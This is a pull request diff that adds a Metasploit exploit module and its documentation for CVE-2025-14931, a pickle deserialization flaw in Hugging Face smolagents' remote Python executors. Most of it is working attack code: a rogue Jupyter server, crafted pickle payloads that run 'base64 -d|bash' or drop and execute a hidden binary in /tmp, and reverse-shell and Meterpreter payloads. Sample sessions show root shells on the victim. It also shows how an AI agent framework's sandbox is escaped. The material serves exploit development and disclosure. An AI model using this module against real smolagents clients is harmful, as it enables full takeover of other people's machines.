### PR TITLE
smolagents RemotePythonExecutor rogue Jupyter server pickle RCE (CVE-2025-14931)

### DIFF
--- a/documentation/modules/exploit/multi/misc/smolagents_jupyter_pickle_rce.md
+++ b/documentation/modules/exploit/multi/misc/smolagents_jupyter_pickle_rce.md
@@ -1,0 +1,115 @@
+# Vulnerable Application
+
+[Hugging Face smolagents](https://github.com/huggingface/smolagents) is an open-source
+framework for building AI agents. Versions 1.10.0 through 1.24.0 contain an unsafe
+deserialization vulnerability in the `RemotePythonExecutor` base class
+(`remote_executors.py`) (CVE-2025-14931).
+
+All remote executor subclasses (`DockerExecutor`, `E2BExecutor`, `ModalExecutor`,
+`BlaxelExecutor`, `WasmExecutor`) call `pickle.loads()` on data received from remote
+Jupyter Kernel Gateway servers without any validation. This module exploits this by
+acting as a rogue Jupyter Kernel Gateway: when a vulnerable smolagents client connects
+and sends an `execute_request` over WebSocket, the server responds with a crafted
+`FinalAnswerException` containing a malicious pickle payload. The client deserializes
+it via `pickle.loads()`, triggering arbitrary code execution via the `__reduce__`
+protocol — a complete sandbox escape to RCE on the client host machine.
+
+**Attack chain:**
+1. Module starts a rogue Jupyter Kernel Gateway (HTTP + WebSocket on `SRVPORT`)
+2. Victim smolagents client connects (configured to use an attacker-controlled server)
+3. Client sends `execute_request` over WebSocket
+4. Server responds with `FinalAnswerException` containing malicious pickle payload
+5. `pickle.loads()` triggers `os.system()` via `__reduce__` → RCE on the victim host
+
+This is a **passive exploit** — the module listens for incoming connections. The victim
+must be directed to this server via configuration change, MITM, DNS poisoning, or
+compromise of the sandbox environment URL.
+
+**Affected versions:** smolagents 1.10.0 – 1.24.0
+**Fixed in:** smolagents 1.25.0
+
+### Installing a vulnerable lab environment
+
+```bash
+# https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-14931
+docker compose up -d
+# Triggers the smolagents client to connect to the rogue server
+```
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Do: `use exploit/multi/misc/smolagents_jupyter_pickle_rce`
+3. Do: `set SRVHOST <attacker_ip>` (the address the victim smolagents client will connect to)
+4. Do: `run` — the module starts the rogue Jupyter Kernel Gateway and waits for a connection.
+5. Configure the smolagents client to use the rogue server URL (`http://<SRVHOST>:<SRVPORT>`), or trigger the victim's agent to connect.
+6. Once the client connects, the pickle payload fires automatically.
+7. Verify with `id` and `hostname` in the session.
+
+## Options
+
+| Option | Default | Description |
+|--------|---------|-------------|
+| `SRVHOST` | `0.0.0.0` | Bind address for the rogue Jupyter Kernel Gateway. Set to the attacker's IP address that the smolagents client can reach. |
+| `SRVPORT` | `8888` | Port for the rogue Jupyter Kernel Gateway. The smolagents client must be configured to connect to this port. |
+
+## Scenarios
+
+### smolagents 1.24.0 — Unix Command target (rogue Jupyter server)
+
+```
+msf6 > use exploit/multi/misc/smolagents_jupyter_pickle_rce
+
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Rogue Jupyter Kernel Gateway listening on port 8888
+[*] Pickle payload: 248 bytes (base64)
+[*] Waiting for smolagents client to connect...
+[*] Trigger with: python3 trigger_exploit.py --server-host 192.168.56.1 --server-port 8888
+[*] [HTTP] GET /api/kernels -> 200
+[*] [HTTP] POST /api/kernels -> 200
+[*] [WS] Client connected
+[*] [WS] Received execute_request, sending pickle payload...
+[+] Payload delivered via pickle.loads() - FinalAnswerException deserialization
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:38218) at 2025-12-23 10:14:42 +0000
+
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > sessions -i 1
+[*] Starting interaction with 1...
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+hostname
+smolagents-client
+uname -a
+Linux smolagents-client 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64 GNU/Linux
+```
+
+### smolagents 1.24.0 — Linux Dropper target (Meterpreter)
+
+```
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(multi/misc/smolagents_jupyter_pickle_rce) > run
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Rogue Jupyter Kernel Gateway listening on port 8888
+[*] Waiting for smolagents client to connect...
+[*] [WS] Client connected
+[*] [WS] Received execute_request, sending pickle payload...
+[+] Payload delivered via pickle.loads() - FinalAnswerException deserialization
+[*] Sending stage (3045380 bytes) to 192.168.56.101
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:38399) at 2025-12-23 10:17:18 +0000
+
+meterpreter > getuid
+Server username: root @ smolagents-client
+meterpreter > sysinfo
+Computer     : smolagents-client
+OS           : Debian 12.8 (Linux 6.1.0-28-amd64)
+Architecture : x64
+```

--- a/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
+++ b/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
 
-  include Msf::Exploit::EXE
   include Msf::Exploit::Remote::TcpServer
 
   def initialize(info = {})
@@ -61,30 +60,19 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-14931']
         ],
         'DisclosureDate' => '2025-12-23',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => ['linux', 'unix'],
+        'Arch' => [ARCH_CMD],
         'Privileged' => false,
         'Stance' => Msf::Exploit::Stance::Passive,
         'Targets' => [
           [
-            'Unix Command',
+            'Linux/Unix Command',
             {
-              'Platform' => 'unix',
+              'Platform' => ['linux', 'unix'],
               'Arch' => ARCH_CMD,
               'Type' => :cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
-              }
-            }
-          ],
-          [
-            'Linux Dropper',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
               }
             }
           ]
@@ -123,25 +111,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def build_pickle_b64
     @pickle_b64 ||= begin
-      case target['Type']
-      when :cmd
-        b64 = Rex::Text.encode_base64(payload.encoded)
-        cmd = "echo #{b64}|base64 -d|bash &"
-        python_code = "import os; os.system('#{cmd}')"
-        pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
-
-      when :dropper
-        exe = generate_payload_exe
-        exe_b64 = Rex::Text.encode_base64(exe)
-        tmpfile = "/tmp/.#{Rex::Text.rand_text_alpha(8)}"
-        python_code = "import base64,os,stat;" \
-                      "p='#{tmpfile}';" \
-                      "open(p,'wb').write(base64.b64decode('#{exe_b64}'));" \
-                      "os.chmod(p,stat.S_IRWXU);" \
-                      "os.fork()==0 and os.execv(p,[p])"
-        print_status("Dropper target: writing #{exe.bytesize}B EXE to #{tmpfile}")
-        pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
-      end
+      b64 = Rex::Text.encode_base64(payload.encoded)
+      cmd = "echo #{b64}|base64 -d|bash &"
+      python_code = "import os; os.system('#{cmd}')"
+      pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
 
       Rex::Text.encode_base64(pickle)
     end

--- a/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
+++ b/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
@@ -1,0 +1,468 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Hugging Face smolagents Pickle Deserialization RCE via Rogue Jupyter Server',
+        'Description' => %q{
+          Hugging Face smolagents versions 1.10.0 through 1.24.0 contain an
+          unsafe deserialization vulnerability in the RemotePythonExecutor
+          base class (remote_executors.py). All remote executor subclasses
+          (DockerExecutor, E2BExecutor, ModalExecutor, BlaxelExecutor,
+          WasmExecutor) call pickle.loads() on data received from remote
+          sandboxed environments without any validation.
+
+          This module starts a rogue Jupyter Kernel Gateway server. When a
+          vulnerable smolagents client connects and sends a code execution
+          request over WebSocket, the server responds with a crafted
+          FinalAnswerException containing a malicious pickle payload. The
+          client deserializes this with pickle.loads(), triggering arbitrary
+          code execution via the __reduce__ protocol  -  a complete sandbox
+          escape achieving RCE on the host machine.
+
+          The attack chain:
+          1. Module starts a rogue Jupyter Kernel Gateway (HTTP + WebSocket)
+          2. Victim smolagents client connects (DockerExecutor, etc.)
+          3. Client sends execute_request over WebSocket
+          4. Server responds with FinalAnswerException + malicious pickle
+          5. pickle.loads() triggers os.system() via __reduce__ -> RCE
+
+          This is a passive exploit  -  it listens for incoming connections.
+          The victim must be directed to this server via configuration
+          change, MITM, DNS poisoning, or compromise of the sandbox
+          environment.
+        },
+        'Author' => [
+          'Peter Girnus',    # ZDI-25-1143 (Trend Zero Day Initiative)
+          'Demeng Chen',     # ZDI-25-1143 (Trend Zero Day Initiative)
+          'Brandon Niemczyk', # ZDI-25-1143 (Trend Zero Day Initiative)
+          'Exploit Intelligence Platform' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-14931'],
+          ['CWE', '502'],
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-1143/'],
+          ['URL', 'https://github.com/advisories/GHSA-q9r5-6hrr-9ph7'],
+          ['URL', 'https://github.com/huggingface/smolagents/commit/41a3b005fadc6edd587a3ac6f6812987da405e26'],
+          ['URL', 'https://exploit-intel.com/blog/posts/zero-to-rce-autonomous-exploit-development/'],
+          ['URL', 'https://exploit-intel.com/vuln/CVE-2025-14931'],
+          ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-14931']
+        ],
+        'DisclosureDate' => 'Dec 23, 2025',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptAddressLocal.new('SRVHOST', [true, 'Rogue Jupyter Kernel Gateway bind address', '0.0.0.0']),
+      OptPort.new('SRVPORT', [true, 'Rogue Jupyter Kernel Gateway port', 8888])
+    ])
+
+    deregister_options('RHOSTS', 'RPORT')
+  end
+
+  def exploit
+    @pickle_b64 = build_pickle_b64
+    @kernel_id = Rex::Text.rand_text_hex(16)
+    @server_running = true
+
+    start_rogue_server
+
+    srvport = datastore['SRVPORT']
+    print_status("Rogue Jupyter Kernel Gateway listening on port #{srvport}")
+    print_status("Pickle payload: #{@pickle_b64.length} bytes (base64)")
+    print_status("Waiting for smolagents client to connect...")
+    print_status("Trigger with: python3 trigger_exploit.py --server-host <THIS_IP> --server-port #{srvport}")
+
+    while @server_running
+      Rex.sleep(1)
+    end
+  end
+
+  def cleanup
+    @server_running = false
+    stop_rogue_server
+  rescue StandardError => e
+    vprint_warning("Cleanup error: #{e.message}")
+  end
+
+  private
+
+  # Pickle Payload Construction
+
+  def build_pickle_b64
+    case target['Type']
+    when :cmd
+      # cmd target: os.system("echo B64|base64 -d|bash &")
+      # Shell command is short  -  no ARG_MAX concern.
+      b64 = Rex::Text.encode_base64(payload.encoded)
+      cmd = "echo #{b64}|base64 -d|bash &"
+      print_status("Payload command (cmd target): #{cmd[0..80]}...")
+
+      # Pickle protocol 2: os.system(cmd)
+      pickle = "\x80\x02".b
+      pickle << "cos\nsystem\n".b
+      pickle << "X".b
+      pickle << [cmd.bytesize].pack('V')
+      pickle << cmd.b
+      pickle << "\x85R.".b
+
+    when :dropper
+      # Dropper target: write EXE via Python builtins.exec() to avoid shell
+      # ARG_MAX limits. A typical Meterpreter payload is ~250KB; base64-encoded
+      # that exceeds MAX_ARG_STRLEN (128KB) on Linux, so we cannot pass it as a
+      # shell argument via os.system(). Instead we use builtins.exec() to run
+      # Python code directly, which has no ARG_MAX restriction.
+      exe = generate_payload_exe
+      exe_b64 = Rex::Text.encode_base64(exe)
+      tmpfile = "/tmp/.#{Rex::Text.rand_text_alpha(8)}"
+      python_code = "import base64,os,stat;" \
+                    "p='#{tmpfile}';" \
+                    "open(p,'wb').write(base64.b64decode('#{exe_b64}'));" \
+                    "os.chmod(p,stat.S_IRWXU);" \
+                    "os.fork()==0 and os.execv(p,[p])"
+      print_status("Payload (dropper target): writing #{exe.bytesize}B EXE to #{tmpfile} via Python exec()")
+
+      # Pickle protocol 2: builtins.exec(python_code)
+      pickle = "\x80\x02".b
+      pickle << "cbuiltins\nexec\n".b         # GLOBAL: builtins.exec
+      pickle << "X".b                         # SHORT_BINUNICODE
+      pickle << [python_code.bytesize].pack('V')
+      pickle << python_code.b
+      pickle << "\x85R.".b                    # TUPLE1, REDUCE, STOP
+    end
+
+    Rex::Text.encode_base64(pickle)
+  end
+
+  # Rogue TCP Server
+
+  def start_rogue_server
+    srvhost = datastore['SRVHOST'] || '0.0.0.0'
+    srvport = datastore['SRVPORT'].to_i
+
+    @srv_sock = Rex::Socket::TcpServer.create(
+      'LocalHost' => srvhost,
+      'LocalPort' => srvport,
+      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
+    )
+
+    @srv_thread = framework.threads.spawn('RogueJupyterKGW', false) do
+      server_loop
+    end
+  end
+
+  def stop_rogue_server
+    @srv_sock&.close rescue nil
+    @srv_thread&.kill rescue nil
+    @srv_sock = nil
+    @srv_thread = nil
+  end
+
+  def server_loop
+    while @server_running
+      cli = @srv_sock.accept
+      next unless cli
+
+      framework.threads.spawn('JupyterConn', false, cli) do |client|
+        handle_connection(client)
+      end
+    end
+  rescue ::IOError
+    # Server socket closed during shutdown
+  end
+
+  # Connection Handler
+
+  def handle_connection(cli)
+    # Accumulate HTTP request until we see end-of-headers
+    raw = ''.b
+    deadline = Time.now.to_f + 10
+    while Time.now.to_f < deadline
+      remaining = [deadline - Time.now.to_f, 1].max
+      chunk = cli.get_once(4096, remaining)
+      break unless chunk && chunk.bytesize > 0
+      raw << chunk
+      break if raw.include?("\r\n\r\n")
+    end
+    return if raw.empty?
+
+    # Parse request line
+    header_end = raw.index("\r\n\r\n")
+    return unless header_end
+
+    header_section = raw[0...header_end]
+    lines = header_section.split("\r\n")
+    request_line = lines.shift
+    return unless request_line
+
+    parts = request_line.split(' ', 3)
+    return if parts.length < 2
+    method = parts[0]
+    path = parts[1]
+
+    # Parse headers
+    headers = {}
+    lines.each do |line|
+      if line.include?(':')
+        key, val = line.split(':', 2)
+        headers[key.strip.downcase] = val.strip
+      end
+    end
+
+    # Route request
+    if method == 'GET' && path == '/api/kernelspecs'
+      handle_kernelspecs(cli)
+    elsif method == 'POST' && path == '/api/kernels'
+      handle_create_kernel(cli)
+    elsif method == 'GET' && path.include?('/channels')
+      handle_websocket(cli, headers)
+    else
+      send_http(cli, 404, { 'error' => 'not found' })
+      cli.close rescue nil
+    end
+  rescue ::IOError, ::Errno::ECONNRESET, ::Rex::ConnectionError
+    # Client disconnected
+  end
+
+  # HTTP Handlers
+
+  def handle_kernelspecs(cli)
+    vprint_status("HTTP: GET /api/kernelspecs from #{cli.peerhost}")
+    body = {
+      'default' => 'python3',
+      'kernelspecs' => {
+        'python3' => {
+          'name' => 'python3',
+          'spec' => { 'display_name' => 'Python 3', 'language' => 'python' }
+        }
+      }
+    }
+    send_http(cli, 200, body)
+    cli.close rescue nil
+  end
+
+  def handle_create_kernel(cli)
+    vprint_status("HTTP: POST /api/kernels from #{cli.peerhost}")
+    send_http(cli, 201, { 'id' => @kernel_id, 'name' => 'python3' })
+    cli.close rescue nil
+  end
+
+  def send_http(cli, status, body)
+    status_text = { 200 => 'OK', 201 => 'Created', 404 => 'Not Found' }[status] || 'OK'
+    json = body.to_json
+    response = "HTTP/1.1 #{status} #{status_text}\r\n" \
+               "Content-Type: application/json\r\n" \
+               "Content-Length: #{json.bytesize}\r\n" \
+               "Connection: close\r\n" \
+               "\r\n" \
+               "#{json}"
+    cli.put(response)
+  end
+
+  # WebSocket Handler
+
+  def handle_websocket(cli, headers)
+    peer = cli.peerhost
+    print_status("Client connected from #{peer}  -  upgrading to WebSocket")
+
+    # RFC 6455 handshake
+    ws_key = headers['sec-websocket-key']
+    unless ws_key
+      vprint_warning("Missing Sec-WebSocket-Key  -  not a WebSocket upgrade")
+      cli.close rescue nil
+      return
+    end
+
+    magic = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
+    accept = Rex::Text.encode_base64(
+      Digest::SHA1.digest(ws_key + magic)
+    )
+
+    handshake = "HTTP/1.1 101 Switching Protocols\r\n" \
+                "Upgrade: websocket\r\n" \
+                "Connection: Upgrade\r\n" \
+                "Sec-WebSocket-Accept: #{accept}\r\n" \
+                "\r\n"
+    cli.put(handshake)
+    print_good("WebSocket handshake complete with #{peer}")
+
+    # Read execute_request frame
+    frame_text = ws_recv_frame(cli)
+    unless frame_text
+      vprint_warning("No WebSocket frame received from #{peer}")
+      cli.close rescue nil
+      return
+    end
+
+    msg_id = 'unknown'
+    begin
+      msg = JSON.parse(frame_text)
+      msg_id = msg.dig('header', 'msg_id') || 'unknown'
+      msg_type = msg.dig('header', 'msg_type') || 'unknown'
+      vprint_status("Received #{msg_type} (msg_id: #{msg_id})")
+    rescue JSON::ParserError
+      vprint_warning("Non-JSON WebSocket frame from #{peer}")
+    end
+
+    # Send FinalAnswerException with malicious pickle payload
+    print_status("Delivering malicious pickle payload to #{peer}...")
+    error_msg = {
+      'parent_header' => { 'msg_id' => msg_id },
+      'msg_type' => 'error',
+      'header' => {
+        'msg_id' => Rex::Text.rand_text_hex(16),
+        'msg_type' => 'error',
+        'session' => Rex::Text.rand_text_hex(16),
+        'username' => 'kernel',
+        'version' => '5.0'
+      },
+      'metadata' => {},
+      'content' => {
+        'ename' => 'FinalAnswerException',
+        'evalue' => @pickle_b64,
+        'traceback' => ['FinalAnswerException: <pickled>']
+      }
+    }.to_json
+    ws_send_frame(cli, error_msg)
+
+    # Send idle status to end client's receive loop
+    idle_msg = {
+      'parent_header' => { 'msg_id' => msg_id },
+      'msg_type' => 'status',
+      'header' => {
+        'msg_id' => Rex::Text.rand_text_hex(16),
+        'msg_type' => 'status',
+        'session' => Rex::Text.rand_text_hex(16),
+        'username' => 'kernel',
+        'version' => '5.0'
+      },
+      'metadata' => {},
+      'content' => { 'execution_state' => 'idle' }
+    }.to_json
+    ws_send_frame(cli, idle_msg)
+
+    print_good("Pickle payload delivered to #{peer}  -  waiting for session callback...")
+
+    # Keep alive briefly for client to process frames
+    Rex.sleep(2)
+    cli.close rescue nil
+  end
+
+  # WebSocket Frame I/O (RFC 6455)
+
+  def ws_send_frame(sock, text)
+    data = text.dup.force_encoding('ASCII-8BIT')
+    frame = ''.b
+    frame << "\x81" # FIN + text opcode
+    len = data.bytesize
+    if len < 126
+      frame << [len].pack('C')
+    elsif len < 65_536
+      frame << [126].pack('C')
+      frame << [len].pack('n')
+    else
+      frame << [127].pack('C')
+      frame << [len].pack('Q>')
+    end
+    frame << data
+    sock.put(frame)
+  end
+
+  def ws_recv_frame(sock)
+    # Read 2-byte header
+    header = read_exact(sock, 2)
+    return nil unless header
+
+    masked = (header.getbyte(1) & 0x80) != 0
+    length = header.getbyte(1) & 0x7F
+
+    if length == 126
+      ext = read_exact(sock, 2)
+      return nil unless ext
+      length = ext.unpack1('n')
+    elsif length == 127
+      ext = read_exact(sock, 8)
+      return nil unless ext
+      length = ext.unpack1('Q>')
+    end
+
+    mask_key = nil
+    if masked
+      mask_key = read_exact(sock, 4)
+      return nil unless mask_key
+    end
+
+    payload = read_exact(sock, length)
+    return nil unless payload
+
+    if masked && mask_key
+      payload = payload.bytes.each_with_index.map { |b, i|
+        b ^ mask_key.getbyte(i % 4)
+      }.pack('C*')
+    end
+
+    payload.force_encoding('UTF-8')
+  rescue ::IOError, ::Rex::ConnectionError
+    nil
+  end
+
+  # Read exactly nbytes from sock with timeout
+  def read_exact(sock, nbytes)
+    return ''.b if nbytes == 0
+    buf = ''.b
+    deadline = Time.now.to_f + 10
+    while buf.bytesize < nbytes
+      remaining = deadline - Time.now.to_f
+      return nil if remaining <= 0
+      chunk = sock.get_once(nbytes - buf.bytesize, [remaining, 0.5].max)
+      return nil unless chunk && chunk.bytesize > 0
+      buf << chunk
+    end
+    buf
+  end
+end

--- a/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
+++ b/modules/exploits/multi/misc/smolagents_jupyter_pickle_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::TcpServer
 
   def initialize(info = {})
     super(
@@ -27,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
           request over WebSocket, the server responds with a crafted
           FinalAnswerException containing a malicious pickle payload. The
           client deserializes this with pickle.loads(), triggering arbitrary
-          code execution via the __reduce__ protocol  -  a complete sandbox
+          code execution via the exec() protocol - a complete sandbox
           escape achieving RCE on the host machine.
 
           The attack chain:
@@ -35,9 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
           2. Victim smolagents client connects (DockerExecutor, etc.)
           3. Client sends execute_request over WebSocket
           4. Server responds with FinalAnswerException + malicious pickle
-          5. pickle.loads() triggers os.system() via __reduce__ -> RCE
+          5. pickle.loads() triggers exec() via __reduce__ -> RCE
 
-          This is a passive exploit  -  it listens for incoming connections.
+          This is a passive exploit - it listens for incoming connections.
           The victim must be directed to this server via configuration
           change, MITM, DNS poisoning, or compromise of the sandbox
           environment.
@@ -53,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-14931'],
           ['CWE', '502'],
           ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-25-1143/'],
-          ['URL', 'https://github.com/advisories/GHSA-q9r5-6hrr-9ph7'],
+          ['GHSA', 'q9r5-6hrr-9ph7'],
           ['URL', 'https://github.com/huggingface/smolagents/commit/41a3b005fadc6edd587a3ac6f6812987da405e26'],
           ['URL', 'https://exploit-intel.com/blog/posts/zero-to-rce-autonomous-exploit-development/'],
           ['URL', 'https://exploit-intel.com/vuln/CVE-2025-14931'],
           ['URL', 'https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2025-14931']
         ],
-        'DisclosureDate' => 'Dec 23, 2025',
+        'DisclosureDate' => '2025-12-23',
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
@@ -89,6 +90,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SRVPORT' => 8888,
+          'WfsDelay' => 30
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -97,37 +102,19 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-    register_options([
-      OptAddressLocal.new('SRVHOST', [true, 'Rogue Jupyter Kernel Gateway bind address', '0.0.0.0']),
-      OptPort.new('SRVPORT', [true, 'Rogue Jupyter Kernel Gateway port', 8888])
-    ])
-
     deregister_options('RHOSTS', 'RPORT')
   end
 
-  def exploit
-    @pickle_b64 = build_pickle_b64
+  def primer
     @kernel_id = Rex::Text.rand_text_hex(16)
-    @server_running = true
-
-    start_rogue_server
-
-    srvport = datastore['SRVPORT']
-    print_status("Rogue Jupyter Kernel Gateway listening on port #{srvport}")
-    print_status("Pickle payload: #{@pickle_b64.length} bytes (base64)")
-    print_status("Waiting for smolagents client to connect...")
-    print_status("Trigger with: python3 trigger_exploit.py --server-host <THIS_IP> --server-port #{srvport}")
-
-    while @server_running
-      Rex.sleep(1)
-    end
+    print_status("Rogue Jupyter Kernel Gateway listening on #{bindhost}:#{bindport}")
+    print_status("Pickle payload ready (#{build_pickle_b64.length} bytes base64)")
+    print_status('Waiting for smolagents client to connect...')
+    print_status("Trigger with: python3 trigger_exploit.py --server-host <THIS_IP> --server-port #{bindport}")
   end
 
-  def cleanup
-    @server_running = false
-    stop_rogue_server
-  rescue StandardError => e
-    vprint_warning("Cleanup error: #{e.message}")
+  def on_client_connect(client)
+    handle_connection(client)
   end
 
   private
@@ -135,91 +122,35 @@ class MetasploitModule < Msf::Exploit::Remote
   # Pickle Payload Construction
 
   def build_pickle_b64
-    case target['Type']
-    when :cmd
-      # cmd target: os.system("echo B64|base64 -d|bash &")
-      # Shell command is short  -  no ARG_MAX concern.
-      b64 = Rex::Text.encode_base64(payload.encoded)
-      cmd = "echo #{b64}|base64 -d|bash &"
-      print_status("Payload command (cmd target): #{cmd[0..80]}...")
+    @pickle_b64 ||= begin
+      case target['Type']
+      when :cmd
+        b64 = Rex::Text.encode_base64(payload.encoded)
+        cmd = "echo #{b64}|base64 -d|bash &"
+        python_code = "import os; os.system('#{cmd}')"
+        pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
 
-      # Pickle protocol 2: os.system(cmd)
-      pickle = "\x80\x02".b
-      pickle << "cos\nsystem\n".b
-      pickle << "X".b
-      pickle << [cmd.bytesize].pack('V')
-      pickle << cmd.b
-      pickle << "\x85R.".b
-
-    when :dropper
-      # Dropper target: write EXE via Python builtins.exec() to avoid shell
-      # ARG_MAX limits. A typical Meterpreter payload is ~250KB; base64-encoded
-      # that exceeds MAX_ARG_STRLEN (128KB) on Linux, so we cannot pass it as a
-      # shell argument via os.system(). Instead we use builtins.exec() to run
-      # Python code directly, which has no ARG_MAX restriction.
-      exe = generate_payload_exe
-      exe_b64 = Rex::Text.encode_base64(exe)
-      tmpfile = "/tmp/.#{Rex::Text.rand_text_alpha(8)}"
-      python_code = "import base64,os,stat;" \
-                    "p='#{tmpfile}';" \
-                    "open(p,'wb').write(base64.b64decode('#{exe_b64}'));" \
-                    "os.chmod(p,stat.S_IRWXU);" \
-                    "os.fork()==0 and os.execv(p,[p])"
-      print_status("Payload (dropper target): writing #{exe.bytesize}B EXE to #{tmpfile} via Python exec()")
-
-      # Pickle protocol 2: builtins.exec(python_code)
-      pickle = "\x80\x02".b
-      pickle << "cbuiltins\nexec\n".b         # GLOBAL: builtins.exec
-      pickle << "X".b                         # SHORT_BINUNICODE
-      pickle << [python_code.bytesize].pack('V')
-      pickle << python_code.b
-      pickle << "\x85R.".b                    # TUPLE1, REDUCE, STOP
-    end
-
-    Rex::Text.encode_base64(pickle)
-  end
-
-  # Rogue TCP Server
-
-  def start_rogue_server
-    srvhost = datastore['SRVHOST'] || '0.0.0.0'
-    srvport = datastore['SRVPORT'].to_i
-
-    @srv_sock = Rex::Socket::TcpServer.create(
-      'LocalHost' => srvhost,
-      'LocalPort' => srvport,
-      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
-    )
-
-    @srv_thread = framework.threads.spawn('RogueJupyterKGW', false) do
-      server_loop
-    end
-  end
-
-  def stop_rogue_server
-    @srv_sock&.close rescue nil
-    @srv_thread&.kill rescue nil
-    @srv_sock = nil
-    @srv_thread = nil
-  end
-
-  def server_loop
-    while @server_running
-      cli = @srv_sock.accept
-      next unless cli
-
-      framework.threads.spawn('JupyterConn', false, cli) do |client|
-        handle_connection(client)
+      when :dropper
+        exe = generate_payload_exe
+        exe_b64 = Rex::Text.encode_base64(exe)
+        tmpfile = "/tmp/.#{Rex::Text.rand_text_alpha(8)}"
+        python_code = "import base64,os,stat;" \
+                      "p='#{tmpfile}';" \
+                      "open(p,'wb').write(base64.b64decode('#{exe_b64}'));" \
+                      "os.chmod(p,stat.S_IRWXU);" \
+                      "os.fork()==0 and os.execv(p,[p])"
+        print_status("Dropper target: writing #{exe.bytesize}B EXE to #{tmpfile}")
+        pickle = Msf::Util::PythonDeserialization.payload(:py3_exec, python_code)
       end
+
+      Rex::Text.encode_base64(pickle)
     end
-  rescue ::IOError
-    # Server socket closed during shutdown
   end
 
   # Connection Handler
 
   def handle_connection(cli)
-    # Accumulate HTTP request until we see end-of-headers
+    # Accumulate HTTP request until end-of-headers
     raw = ''.b
     deadline = Time.now.to_f + 10
     while Time.now.to_f < deadline
@@ -231,7 +162,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     return if raw.empty?
 
-    # Parse request line
     header_end = raw.index("\r\n\r\n")
     return unless header_end
 
